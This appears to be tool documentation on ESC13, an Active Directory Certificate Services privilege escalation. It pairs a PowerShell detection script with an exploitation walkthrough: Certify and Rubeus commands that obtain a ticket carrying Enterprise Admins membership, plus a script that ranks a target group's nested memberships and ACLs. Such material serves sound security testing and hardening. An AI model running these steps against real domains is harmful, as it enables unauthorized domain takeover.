ESC13 is a misconfiguration in Active Directory Certificate Services (AD CS) that stems from overly permissive enrollment rights on certificate templates that carry an administrative issuance policy. Specifically, if a certificate template is configured with an issuance policy whose OID is linked to a domain group, then anyone who authenticates (via PKINIT) with a certificate issued from that template gains membership in the linked group for the lifetime of the resulting Kerberos ticket. The membership exists only in tickets obtained with the certificate; it is not granted to password or NTLM logons.
Microsoft calls this feature Authentication Mechanism Assurance (AMA).

Background

This configuration was first discovered by Adam Burford, and later tagged ESC13 by Jonas Bülow Knudsen in this blog post.

Vulnerability Criteria

According to the research, all of the following criteria must be met for an ESC13 vulnerability:
  • The enterprise CA grants enrollment rights to the attacker-controlled user.
    • Otherwise, the user would be unable to request any certificates from the CA.
  • The certificate template grants enrollment rights to the attacker-controlled user.
    • Otherwise, the user would be unable to request certificates based on the specific template.
  • The “manager approval” feature is disabled for the certificate template.
    • Otherwise, a “CA Manager” would have to manually review and approve the certificate request.
  • The “authorized signature” feature is disabled for the certificate template.
    • Otherwise, an enrollment agent would need to sign the certificate request on behalf of the requester.
  • The certificate template defines an Extended Key Usage (EKU) that enables client authentication.
    • Client Authentication (1.3.6.1.5.5.7.3.2)
    • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • Any Purpose (2.5.29.37.0)
    • Subordinate CA (No EKUs)
  • The certificate template contains an issuance policy whose OID is linked (msDS-OIDToGroupLink) to a universal domain group that has no members.
    • Otherwise, AMA does not apply and we do not gain membership in the domain group when authenticating with the certificate.

Detection

We can search for certificate templates with these conditions using the enum-templates --filter-vulnerable command from Certify. For more information about the command and its parameters, please refer to the Command Overview page.
Certify.exe enum-templates --filter-enabled --filter-vulnerable --hide-admins
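The criteria above can also be checked directly against the Configuration naming context from a domain-joined host. The following PowerShell script is an added example written for this page; it is not part of Certify. It assumes the ActiveDirectory RSAT module and a user that can read the Public Key Services container (any domain user by default). It walks issuance policy OIDs that carry a group link, then evaluates each template referencing such a policy against the EKU, manager approval, authorized signature, group type and group membership conditions, and lists who holds Enroll on the template. It does not check CA-level enrollment rights (the first criterion), which live on the CA host rather than in AD.

```powershell
# Added example for this page, not part of Certify. Enumerates ESC13 candidates with the
# ActiveDirectory RSAT module by walking the criteria listed above.
Import-Module ActiveDirectory

$configNC = (Get-ADRootDSE).configurationNamingContext
$pkiBase  = "CN=Public Key Services,CN=Services,$configNC"

# EKUs from the criteria list; an empty pKIExtendedKeyUsage (Subordinate CA) also qualifies.
$clientAuthEkus = @(
    '1.3.6.1.5.5.7.3.2',      # Client Authentication
    '1.3.6.1.5.2.3.4',        # PKINIT Client Authentication
    '1.3.6.1.4.1.311.20.2.2', # Smart Card Logon
    '2.5.29.37.0'             # Any Purpose
)

$CT_FLAG_PEND_ALL_REQUESTS = 0x2   # msPKI-Enrollment-Flag bit: manager approval required
$GROUP_TYPE_UNIVERSAL      = 0x8   # groupType bit for universal groups
$ENROLL_RIGHT_GUID = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'  # Certificate-Enrollment extended right
$GENERIC_ALL   = [int][System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$EXTENDED_RIGHT = [int][System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight

# Step 1: issuance policy OIDs that carry a group link (AMA). Only these can be abused for ESC13.
$linkedOids = @{}
Get-ADObject -SearchBase "CN=OID,$pkiBase" `
    -LDAPFilter '(&(objectClass=msPKI-Enterprise-Oid)(msDS-OIDToGroupLink=*))' `
    -Properties msPKI-Cert-Template-OID, msDS-OIDToGroupLink |
    ForEach-Object { $linkedOids[$_.'msPKI-Cert-Template-OID'] = $_.'msDS-OIDToGroupLink' }

# Step 2: templates that reference one of those policies, with the remaining criteria evaluated.
Get-ADObject -SearchBase "CN=Certificate Templates,$pkiBase" `
    -LDAPFilter '(objectClass=pKICertificateTemplate)' `
    -Properties msPKI-Certificate-Policy, pKIExtendedKeyUsage, msPKI-Enrollment-Flag, msPKI-RA-Signature, nTSecurityDescriptor |
ForEach-Object {
    $tmpl = $_
    foreach ($policy in @($tmpl.'msPKI-Certificate-Policy')) {
        if (-not $linkedOids.ContainsKey($policy)) { continue }

        $ekus       = @($tmpl.pKIExtendedKeyUsage)
        $ekuOk      = ($ekus.Count -eq 0) -or [bool]($ekus | Where-Object { $clientAuthEkus -contains $_ })
        $noApproval = (([int]$tmpl.'msPKI-Enrollment-Flag' -band $CT_FLAG_PEND_ALL_REQUESTS) -eq 0)
        $noRaSig    = ([int]$tmpl.'msPKI-RA-Signature' -eq 0)

        $group     = Get-ADGroup $linkedOids[$policy] -Properties member, groupType
        $universal = (([int]$group.groupType -band $GROUP_TYPE_UNIVERSAL) -ne 0)
        $empty     = (@($group.member).Count -eq 0)

        # Principals allowed to enroll: Enroll extended right, all extended rights, or GenericAll.
        $enrollers = $tmpl.nTSecurityDescriptor.Access |
            Where-Object {
                $_.AccessControlType -eq 'Allow' -and (
                    (([int]$_.ActiveDirectoryRights -band $GENERIC_ALL) -ne 0) -or
                    ((([int]$_.ActiveDirectoryRights -band $EXTENDED_RIGHT) -ne 0) -and
                     ($_.ObjectType -eq $ENROLL_RIGHT_GUID -or $_.ObjectType -eq [guid]::Empty))
                )
            } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique

        [pscustomobject]@{
            Template               = $tmpl.Name
            IssuancePolicy         = $policy
            LinkedGroup            = $group.Name
            ClientAuthEKU          = $ekuOk
            NoManagerApproval      = $noApproval
            NoAuthorizedSignature  = $noRaSig
            GroupUniversalAndEmpty = ($universal -and $empty)
            Enrollers              = ($enrollers -join ', ')
            ESC13Candidate         = ($ekuOk -and $noApproval -and $noRaSig -and $universal -and $empty)
        }
    }
} | Format-Table -AutoSize
```

A row with ESC13Candidate set to True and a low-privileged principal (for example Domain Users or Authenticated Users) in Enrollers is what Certify's --filter-vulnerable output corresponds to; confirm the template is also published on an enterprise CA (the certificateTemplates attribute of the pKIEnrollmentService object) and that the CA itself grants the principal enrollment rights before treating it as exploitable.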

Exploitation

Once we have identified a vulnerable certificate template that our attacker-controlled user can enroll in, we evaluate whether the issuance policy links to a group that is worth compromising. This includes checking which groups it is a member of (including nested membership) and which access control permissions the group holds across the environment.
Get-ADGroup TemporaryAdmins -Properties MemberOf,Members
Since the TemporaryAdmins group is a member of the Enterprise Admins group, we deem it worth compromising and request a certificate from the template using the request command from Certify.
Certify.exe request --ca ca01.corp.local\CORP-CA01-CA --template TemporaryAdmin
Once the certificate has been issued, we pass it to Rubeus with the asktgt command, authenticating as our low-privileged user.
Rubeus.exe asktgt /user:lowpriv /certificate:MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh... /ptt
Because the /ptt parameter was supplied to Rubeus when requesting the TGT, the resulting ticket is now in our Kerberos ticket cache and carries Enterprise Admins membership. We can verify this by executing whoami /all on a domain controller.
Invoke-Command -ComputerName DC01 -ScriptBlock { whoami /all }
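Get-ADGroup with MemberOf shows only direct membership, and it says nothing about the ACLs the group holds. The following PowerShell script is an added example written for this page (not Certify or Rubeus code) that completes the evaluation step above: it resolves every group the linked group is nested in, transitively, and enumerates the objects in the domain on which the group holds rights an attacker cares about. It assumes the ActiveDirectory RSAT module; TemporaryAdmins is the group name from the walkthrough above and should be replaced with the group your candidate template links to.

```powershell
# Added example for this page, not part of Certify or Rubeus. Assesses how valuable the
# group behind an ESC13 issuance policy is before requesting a certificate.
Import-Module ActiveDirectory

$groupName = 'TemporaryAdmins'                  # group from the walkthrough above; replace as needed
$group     = Get-ADGroup $groupName
$domain    = Get-ADDomain
$aceOwner  = "$($domain.NetBIOSName)\$($group.Name)"   # how the group appears in ACE IdentityReference

# (1) Transitive nesting: every group whose 'member' chain contains our group.
#     1.2.840.113556.1.4.1941 is LDAP_MATCHING_RULE_IN_CHAIN, so Enterprise Admins shows up
#     even if TemporaryAdmins reaches it through an intermediate group.
$nestedIn = Get-ADGroup -LDAPFilter "(member:1.2.840.113556.1.4.1941:=$($group.DistinguishedName))" |
    Select-Object -ExpandProperty Name | Sort-Object
Write-Host "[$groupName] is transitively a member of:"
$nestedIn | ForEach-Object { Write-Host "  $_" }

# (2) Rights the group holds directly on users, groups, computers, OUs and the domain head.
#     Reading nTSecurityDescriptor for every object is slow in a large domain; narrow -SearchBase
#     to a high-value OU if needed.
$dangerous = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|ExtendedRight'
$aces = Get-ADObject -SearchBase $domain.DistinguishedName `
    -LDAPFilter '(|(objectClass=user)(objectClass=group)(objectClass=computer)(objectClass=organizationalUnit)(objectClass=domainDNS))' `
    -Properties nTSecurityDescriptor |
ForEach-Object {
    $target = $_
    $target.nTSecurityDescriptor.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.IdentityReference.Value -eq $aceOwner -and
            $_.ActiveDirectoryRights.ToString() -match $dangerous
        } |
        ForEach-Object {
            [pscustomobject]@{
                Object     = $target.DistinguishedName
                Rights     = $_.ActiveDirectoryRights
                ObjectType = $_.ObjectType   # non-empty GUID limits the right to one attribute or extended right
                Inherited  = $_.IsInherited
            }
        }
}
Write-Host "`nObjects on which [$groupName] holds interesting rights:"
$aces | Format-Table -AutoSize
```

Membership in a privileged group (as in the walkthrough, where the group sits in Enterprise Admins) is the simplest win, but an otherwise unremarkable group that holds GenericAll or WriteDacl on a Tier 0 object, or an ExtendedRight whose ObjectType is the DS-Replication-Get-Changes pair, is just as worth requesting a certificate for.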